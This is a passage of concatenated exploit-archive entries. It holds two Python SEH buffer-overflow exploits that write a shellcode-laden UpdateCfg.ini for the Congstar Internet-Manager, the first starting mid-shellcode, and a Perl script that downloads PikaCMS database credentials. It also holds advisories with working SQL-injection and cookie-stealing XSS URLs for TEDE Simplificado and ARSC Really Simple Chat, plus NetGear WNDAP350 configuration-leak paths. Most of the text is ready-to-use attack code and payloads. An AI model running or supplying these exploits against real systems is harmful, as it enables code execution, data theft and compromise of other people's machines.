"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
header  = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
footer  = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a" 
exploit =  header + footer
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()
            
#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow 
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
from struct import pack
buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
junk="\x41" * 18164
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x7C3A1868)#7C3A1868
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
buffer2 += "\x79\x73\x3d\x31\x0a"
exploit =  buffer1 + poc + buffer2
try:
    out_file = open("UpdateCfg.ini",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"
            
source: https://www.securityfocus.com/bid/48068/info

PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.

Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
            
source: https://www.securityfocus.com/bid/48067/info

TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected. 

http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 
            
source: https://www.securityfocus.com/bid/48083/info

ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected. 

SQL injection:

http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

Cross-site Scripting:

http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
            
source: https://www.securityfocus.com/bid/48085/info

NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.

A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.

WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected. 

http://www.example.com/downloadFile.php
http://www.example.com/BackupConfig.php